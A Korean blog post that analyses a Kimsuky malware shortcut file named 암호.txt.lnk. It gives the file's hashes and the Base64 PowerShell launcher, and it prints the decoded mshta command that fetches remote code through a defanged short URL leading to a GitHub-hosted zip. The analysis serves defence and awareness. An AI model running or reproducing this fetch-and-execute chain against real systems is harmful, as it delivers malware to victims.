꿈을꾸는 파랑새

오늘은 북한 해킹 단체인 김수키(Kimsuky) 에서 만든 악성코드-암호.txt.lnk 에 대해 글을 적어 보겠습니다. 이번 악성코드는 분석은 너무 날로 먹는 느낌인 악성코드입니다.
파일명: 암호.txt.lnk
사이즈:1 MB
MD5:8506cedb51cd59e549c41ccada365ede
SHA-1:5787d8c9543acffceddbc76df95801e1ff96d847
SHA-256:46772972037abd7eba98599a759a8560d503d035b48ab3560bda2044e052ea91
입니다.

악성코드 내부 모습
악성코드 내부 모습

악성코드 분석

1.-e 옵션
PowerShell 사용을 해서 -e를 사용을 하고 뒤에 붙은 Base64 실행을 합니다.
2. Base64 디코딩 결과
UTF-16LE로 디코딩:
mshta   "hxxps://link24(.)kr/1(v)qmB8"
사용자가 파일을 실행했다고 하면 
1.PowerShell 실행
2.Base64 디코딩

악성코드 파일 다운로드
악성코드 파일 다운로드

3.다음 명령 실행:
mshta 를 이용을 해서 단축 주소를 사용해서 깃헙으로 이동을 하고 어떤 압축 파일을 다운로드 하는데 그것이 404 라는 모르겠음
hxxps://github(.)com/jensonhwang/studious-octo-system/releases/download/v1.0.0/pwko(.)zip?v=698e(b)d433e56d2(.)13316218
mshta.exe
Windows 기본 내장 프로그램
HTA(HTML Application) 실행 도구
요즈음 북한 애들 보니까 링크 24가지고 단축주소 사용을 하는 것이 종종 보임. 어차피 해당 단축주소 변환 사이트는 한국에 있으므로 경찰 분들이 알아서 하겠지만…. 아무튼, 이런 방법도 사용하고 있으니 주의하시는 걸로….

공유하기

facebook twitter kakaoTalk kakaostory naver band